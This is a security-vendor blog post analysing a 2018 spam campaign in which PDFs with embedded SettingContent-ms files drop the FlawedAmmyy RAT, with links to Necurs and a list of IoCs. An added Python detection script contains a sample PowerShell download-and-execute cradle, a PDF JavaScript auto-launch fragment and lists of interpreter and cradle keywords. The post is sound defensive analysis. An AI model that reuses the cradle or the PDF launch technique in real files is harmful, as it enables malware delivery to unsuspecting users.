Spam Campaign Abusing SettingContent-ms Found Dropping Same FlawedAmmyy RAT Distributed by Necurs

Posted on: July 31, 2018 at 7:00 am
Posted in: Malware, Spam
Author: Trend Micro

By Anita Hsieh, Rubio Wu, and Kawabata Kohei

Trend Micro detected a spam campaign that drops the same FlawedAmmyy RAT (remote access Trojan) that a Necurs module installs as its final payload on bots whose user domains are bank- or POS-related. The campaign also abuses SettingContent-ms, an XML-based shortcut format for opening pages of the Windows Settings app. The format's DeepLink element holds the command Windows runs when the shortcut is opened, and because that command is not limited to Settings pages, an attacker can place an arbitrary command line there. In this campaign the malicious SettingContent-ms file was embedded in a PDF document that drops the RAT.


Figure 1. The volume of spam emails on July 12 and 13

From our research and analysis of spam emails sent on July 12 and 13, more than 50 percent of the email accounts that received this spam belonged to banks located in countries like Malaysia, Indonesia, Kenya, Romania, Poland, and Austria.

Infection chain

Figure 2. Infection chain of the spam campaign

The spam emails used subjects such as “invoice” and strings like “important announcement,” “copy,” “Scanned image,” “security bulletin,” and “whats this” to trick recipients. The PDF attached to these emails contains embedded JavaScript and an embedded file named “downl.SettingContent-ms,” similar to what Proofpoint has reported. When the user opens the PDF, the JavaScript runs and launches the SettingContent-ms file.

Once “downl.SettingContent-ms” is opened, Windows runs the PowerShell command in its <DeepLink> element, which downloads the FlawedAmmyy RAT from hxxp://169[.]239[.]129[.]117/cal and then executes it. This FlawedAmmyy variant is the same one installed by the Necurs module on bots under bank- and POS-related user domains.
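As an added illustration (not code from the original post or from Trend Micro), the Python script below performs the two triage checks a responder would want for this chain: it scans raw PDF bytes for the combination of auto-run JavaScript and an embedded *.SettingContent-ms attachment, and it parses a SettingContent-ms file to flag a DeepLink that launches an interpreter or a download cradle instead of a Settings page. The sample PDF fragment and the two SettingContent-ms documents are constructed for this example, the download URL in them is a placeholder (example.invalid), and the interpreter and cradle keyword lists are heuristics chosen here, not indicators from the post.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic lists chosen for this example (not indicators from the post):
# interpreters/LOLBins that have no business inside a Settings shortcut,
# and strings typical of a download-and-execute cradle.
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "cmd /", "mshta", "wscript",
                "cscript", "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
CRADLE_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                "invoke-expression", "iex ", "start-process", "http://", "https://")

# Raw-byte markers whose combination reproduces the chain described above:
# auto-run JavaScript plus an embedded *.SettingContent-ms attachment.
PDF_MARKERS = {
    "settingcontent_name": re.compile(rb"\.SettingContent-ms", re.IGNORECASE),
    "embedded_file": re.compile(rb"/EmbeddedFile"),
    "open_action": re.compile(rb"/OpenAction"),
    "javascript": re.compile(rb"/JavaScript|/JS\b"),
}


def scan_pdf(data: bytes) -> dict:
    """Report which markers are present; all four together match this campaign's shape."""
    hits = {name: bool(rx.search(data)) for name, rx in PDF_MARKERS.items()}
    hits["matches_chain"] = all(hits[name] for name in PDF_MARKERS)
    return hits


def extract_deeplinks(xml_text: str) -> list:
    """Collect every <DeepLink> value, ignoring the XML namespace on the tag."""
    root = ET.fromstring(xml_text)
    return [(el.text or "").strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "DeepLink"]


def deeplink_verdict(deeplink: str) -> tuple:
    """Classify one DeepLink as ('benign'|'suspicious'|'review', [reasons])."""
    d = deeplink.lower()
    reasons = [f"interpreter:{i.strip()}" for i in INTERPRETERS if i in d]
    reasons += [f"cradle:{h.strip()}" for h in CRADLE_HINTS if h in d]
    if reasons:
        return "suspicious", reasons
    # Assumption: a legitimate shortcut opens an ms-settings: URI or a
    # Control Panel applet via control.exe.
    if d.startswith("ms-settings:") or "control.exe" in d:
        return "benign", []
    return "review", ["unrecognised launcher"]


def triage_settingcontent(xml_text: str) -> list:
    """Return (deeplink, verdict, reasons) for every DeepLink in the file."""
    return [(link, *deeplink_verdict(link)) for link in extract_deeplinks(xml_text)]


# Constructed PDF fragment: catalog with an OpenAction JavaScript that exports
# and launches an embedded attachment named like the one in the campaign.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /OpenAction 3 0 R "
    b"/Names << /EmbeddedFiles << /Names [(downl.SettingContent-ms) 4 0 R] >> >> >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS (this.exportDataObject({cName:'downl.SettingContent-ms', nLaunch:2});) >> endobj\n"
    b"4 0 obj << /Type /Filespec /F (downl.SettingContent-ms) /EF << /F 5 0 R >> >> endobj\n"
    b"5 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
    b"%%EOF\n"
)

# Constructed SettingContent-ms documents: one benign, one carrying a
# PowerShell download cradle (placeholder URL, not the campaign's).
SAMPLE_BENIGN = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe /name Microsoft.Display</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

SAMPLE_MALICIOUS = SAMPLE_BENIGN.replace(
    r"%windir%\system32\control.exe /name Microsoft.Display",
    r"""powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/cal','C:\Users\Public\cal.exe'); Start-Process 'C:\Users\Public\cal.exe'" """.strip(),
)


if __name__ == "__main__":
    print("pdf:", scan_pdf(SAMPLE_PDF))
    for sample in (SAMPLE_BENIGN, SAMPLE_MALICIOUS):
        for link, verdict, reasons in triage_settingcontent(sample):
            print(verdict, reasons, link[:70])
```

The PDF check is deliberately a raw-byte scan so it works on mail-gateway quarantine without a full PDF parser; object streams can hide the markers, so treat a negative result as "no evidence" rather than "clean".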


Figure 3. Spam mail sample showing a PDF attachment with JavaScript code and SettingContent-ms


Figure 4. The embedded JavaScript code that will be automatically triggered once the PDF is opened


Figure 5. The embedded “downl.SettingContent-ms” file that the JavaScript code opens


Figure 6. The JavaScript code used to open the “downl.SettingContent-ms” file


Figure 7. The “downl.SettingContent-ms” file that the JavaScript code opens once the PDF is opened


Figure 8. The content of the “downl.SettingContent-ms” file, whose <DeepLink> element holds the PowerShell command for downloading the FlawedAmmyy RAT

FlawedAmmyy RAT – the spam campaign’s connection to Necurs

Recently, Necurs has been showing interest in bots with specific characteristics. On July 12, Necurs pushed a module, a downloader for the FlawedAmmyy RAT, to its bots. The module checks whether the bot’s user domain name contains any of the following keywords: bank, banc, aloha, aldelo, and postilion (as seen in Figure 10). Aloha is a restaurant POS system, Aldelo is an iPad POS system, and Postilion is a payment-switching solution that handles transactions across channels from ATM and POS to ecommerce and mobile. If the user domain matches, the module downloads and executes the final payload from hxxp://169[.]239[.]129[.]117/Yjdfel765Hs.


Figure 9. The module obtained the bot’s user domain via the cmd command echo %%USERDOMAIN%%


Figure 10. The module checks if the user domain contains any of the highlighted keywords

Trend Micro Solutions

To defend against spam and threats like Necurs, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs.

Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.

Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.

Indicators of compromise (IoCs)

IoC | Type | Description
5181ede149a8cd560e9e0958be51ec069b486c8714efc02509ab12eee08183a8 | SHA256 | Necurs module that checks if the bot is potentially bank- or POS-related
576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 | SHA256 | PDF used in the spam campaign on July 12 and 13
42ded82ef563db3b35aa797b7befd1a19ec925952f78f076db809aa8558b2e57 | SHA256 | FlawedAmmyy RAT dropped by the Necurs module and the spam campaign on July 12
185[.]99[.]132[.]119:443 | IP + Port | C&C of the FlawedAmmyy RAT
hxxp://169[.]239[.]129[.]117/Yjdfel765Hs | URL | URL used to download the FlawedAmmyy RAT in the Necurs module
hxxp://169[.]239[.]129[.]117/cal | URL | URL used to download the FlawedAmmyy RAT in the SettingContent-ms file embedded in the PDF


Tags: FlawedAmmyy RAT, Necurs, SettingContent-ms